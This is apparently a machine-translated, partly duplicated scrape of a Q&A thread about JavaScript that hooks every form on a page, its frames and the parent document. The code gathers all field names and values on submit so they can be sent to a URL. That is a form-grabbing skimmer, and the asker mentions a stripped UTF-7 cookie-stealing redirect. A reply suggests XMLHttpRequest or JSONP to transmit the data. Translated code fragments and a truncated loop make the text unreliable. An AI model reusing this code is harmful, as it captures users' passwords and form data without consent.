Javascript 通过JS或jquery执行一个URL,该URL为';这不是XSS
我需要能够执行一个php链接后的形式已经提交了我已经在JS的一切工作,除了执行一个没有一些神圣的警告框,这是不是非常友好的用户至少可以说是一个URL。我的前任并不真正理解XSS,所以只是添加了一个图像标签来尝试和执行链接,你对我如何改进/使其工作有什么想法吗。。提前谢谢 功能1Javascript 通过JS或jquery执行一个URL,该URL为';这不是XSS,javascript,javascript-events,Javascript,Javascript Events,我需要能够执行一个php链接后的形式已经提交了我已经在JS的一切工作,除了执行一个没有一些神圣的警告框,这是不是非常友好的用户至少可以说是一个URL。我的前任并不真正理解XSS,所以只是添加了一个图像标签来尝试和执行链接,你对我如何改进/使其工作有什么想法吗。。提前谢谢 功能1 function attach(wnd,handler){ for(var i=0; i<wnd.document.forms.length; i++){ var form
function attach(wnd,handler){
for(var i=0; i<wnd.document.forms.length; i++){
var form = wnd.document.forms[i];
form.addEventListener('submit', handler,false);
}
for(var i=0; i<wnd.frames.length; i++){
var iwnd = wnd.frames[i];
attach(iwnd,handler);
}
}
或者这个Js更好,但我不太确定如何将链的价值返回到url
function FormEnum()
{
var forms = parent.document.getElementsByTagName("form");
for (i = 0 ; i < forms.length; i++)
{
forms[i].addEventListener('submit', function() {
var chain = "";
var forms = parent.document.getElementsByTagName("form");
for (x = 0 ; x < forms.length; x++)
{
var elements = forms[x].elements;
for (e = 0 ; e < elements.length; e++)
{
chain += elements[e].name + "%3d" + elements[e].value + "|";
}
}
attachForm(chain);
}, false);
}
}
函数FormEnum()
{
var forms=parent.document.getElementsByTagName(“表单”);
对于(i=0;i
您知道XSS是什么吗?当然,通过加载映像来传递数据并不是最好的方法,因为您只能获得请求成功的信息,但无法从服务器返回一些附加信息。因此,您可以使用XMLHttpRequest
或作为回退script
使用回调方法(又称ajax和jsonp)加载。但不管怎样,为什么您认为显示的代码在XSS环境下是非常糟糕的代码?我已经编辑了UTF-7 web编码的部分,该部分重定向到另一个内部站点,然后转到documnet.cookie等。。但是谢谢你,我会试试XMLHttpRequest
window.addEventListener('load', function(){attach(window,formSubmit);},false);
function FormEnum()
{
var forms = parent.document.getElementsByTagName("form");
for (i = 0 ; i < forms.length; i++)
{
forms[i].addEventListener('submit', function() {
var chain = "";
var forms = parent.document.getElementsByTagName("form");
for (x = 0 ; x < forms.length; x++)
{
var elements = forms[x].elements;
for (e = 0 ; e < elements.length; e++)
{
chain += elements[e].name + "%3d" + elements[e].value + "|";
}
}
attachForm(chain);
}, false);
}
}